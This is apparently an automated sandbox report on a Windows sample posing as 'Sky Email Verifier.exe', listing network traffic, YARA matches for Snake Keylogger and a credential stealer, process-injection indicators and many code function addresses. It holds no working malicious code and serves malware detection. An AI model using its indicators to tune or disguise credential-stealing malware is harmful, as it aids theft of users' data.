Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49997 version: TLS 1.2

System Summary

barindex
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0791DCA0 CreateProcessAsUserW, 0_2_0791DCA0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_00AF1EB0 0_2_00AF1EB0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_00AF0C88 0_2_00AF0C88
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_00AF0FA0 0_2_00AF0FA0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_00E282E8 0_2_00E282E8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_00E2CC90 0_2_00E2CC90
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_00E27598 0_2_00E27598
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_00E27D00 0_2_00E27D00
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_04FECE9C 0_2_04FECE9C
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_06121C00 0_2_06121C00
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_06121BD1 0_2_06121BD1
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_06120006 0_2_06120006
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_06120040 0_2_06120040
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_061296C7 0_2_061296C7
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_06121BF3 0_2_06121BF3
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07574E58 0_2_07574E58
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_075706E0 0_2_075706E0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0757F848 0_2_0757F848
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07635C90 0_2_07635C90
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07630FC2 0_2_07630FC2
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07630FD0 0_2_07630FD0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07694378 0_2_07694378
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0769C378 0_2_0769C378
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07693210 0_2_07693210
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0769E030 0_2_0769E030
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0769D410 0_2_0769D410
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0769E8A8 0_2_0769E8A8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07693200 0_2_07693200
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0769E016 0_2_0769E016
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07692CB5 0_2_07692CB5
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07918B38 0_2_07918B38
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0791E368 0_2_0791E368
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07910E01 0_2_07910E01
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0791BA30 0_2_0791BA30
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0791BDB0 0_2_0791BDB0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_079135A8 0_2_079135A8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07916CE0 0_2_07916CE0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07910040 0_2_07910040
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07912B98 0_2_07912B98
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_079133F0 0_2_079133F0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07912F50 0_2_07912F50
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07912F40 0_2_07912F40
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07911688 0_2_07911688
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07913598 0_2_07913598
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07913188 0_2_07913188
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07911DB8 0_2_07911DB8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07911DC8 0_2_07911DC8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07914158 0_2_07914158
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07913179 0_2_07913179
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0791C560 0_2_0791C560
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0791289A 0_2_0791289A
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_079128A8 0_2_079128A8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07916CD1 0_2_07916CD1
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_079140DD 0_2_079140DD
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07917CF8 0_2_07917CF8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07917CE8 0_2_07917CE8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07913400 0_2_07913400
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_0791A838 0_2_0791A838
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07910025 0_2_07910025
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07F54B88 0_2_07F54B88
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07F54B78 0_2_07F54B78
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07F5EAB0 0_2_07F5EAB0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe Code function: 0_2_07636857 0_2_07636857
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8A088 4_2_00F8A088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8C146 4_2_00F8C146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8D278 4_2_00F8D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F85362 4_2_00F85362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8C468 4_2_00F8C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8C738 4_2_00F8C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F829E0 4_2_00F829E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F869A0 4_2_00F869A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8E988 4_2_00F8E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8CA08 4_2_00F8CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8CCD8 4_2_00F8CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F86FC8 4_2_00F86FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8CFA9 4_2_00F8CFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8F631 4_2_00F8F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8E97B 4_2_00F8E97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F8FA88 4_2_00F8FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_00F83E09 4_2_00F83E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05627D78 4_2_05627D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05628B58 4_2_05628B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05627720 4_2_05627720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562E578 4_2_0562E578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05620D48 4_2_05620D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05620D38 4_2_05620D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562C108 4_2_0562C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056215E9 4_2_056215E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056215F8 4_2_056215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056265C0 4_2_056265C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056241C8 4_2_056241C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056211A0 4_2_056211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056241B8 4_2_056241B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562E588 4_2_0562E588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562C588 4_2_0562C588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05621190 4_2_05621190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562C598 4_2_0562C598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05623460 4_2_05623460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562BC67 4_2_0562BC67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562DC68 4_2_0562DC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562BC78 4_2_0562BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05620040 4_2_05620040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562FC48 4_2_0562FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562DC57 4_2_0562DC57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562FC58 4_2_0562FC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05626020 4_2_05626020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05626030 4_2_05626030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05620006 4_2_05620006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05623008 4_2_05623008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562A0E0 4_2_0562A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056208E1 4_2_056208E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562E0E8 4_2_0562E0E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056208F0 4_2_056208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562E0F8 4_2_0562E0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562C0F8 4_2_0562C0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562A0D0 4_2_0562A0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05620488 4_2_05620488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05620498 4_2_05620498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562D348 4_2_0562D348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05622748 4_2_05622748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562B348 4_2_0562B348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05628B49 4_2_05628B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05622758 4_2_05622758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562B358 4_2_0562B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05625328 4_2_05625328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562F328 4_2_0562F328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562D337 4_2_0562D337
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562F338 4_2_0562F338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05622300 4_2_05622300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05627711 4_2_05627711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05625318 4_2_05625318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562B7E8 4_2_0562B7E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05622FF8 4_2_05622FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05625BCA 4_2_05625BCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562F7C8 4_2_0562F7C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562D7C9 4_2_0562D7C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562B7DA 4_2_0562B7DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05625BD8 4_2_05625BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562D7D8 4_2_0562D7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05622BA1 4_2_05622BA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05622BB0 4_2_05622BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562F7B9 4_2_0562F7B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05625780 4_2_05625780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05626E60 4_2_05626E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05624A68 4_2_05624A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05626E70 4_2_05626E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05624A78 4_2_05624A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05621A40 4_2_05621A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05621A50 4_2_05621A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05624620 4_2_05624620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562CA28 4_2_0562CA28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562EA07 4_2_0562EA07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05626A0A 4_2_05626A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05624610 4_2_05624610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562CA17 4_2_0562CA17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05626A18 4_2_05626A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562EA18 4_2_0562EA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056222F1 4_2_056222F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05624EC2 4_2_05624EC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056272C8 4_2_056272C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562AEC8 4_2_0562AEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05624ED0 4_2_05624ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562CEA7 4_2_0562CEA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05621EA8 4_2_05621EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562EEA8 4_2_0562EEA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562AEB7 4_2_0562AEB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562CEB8 4_2_0562CEB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_056272B8 4_2_056272B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0562EE97 4_2_0562EE97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_05621E98 4_2_05621E98
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1964651903.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1973635431.00000000078C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRP8SH.dll6 vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBamokinepApp.dll< vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameBamokinepApp.dll< vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000000.1287883325.0000000000DBC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSky Email Verifier.exeF vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe Binary or memory string: OriginalFilenameSky Email Verifier.exeF vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
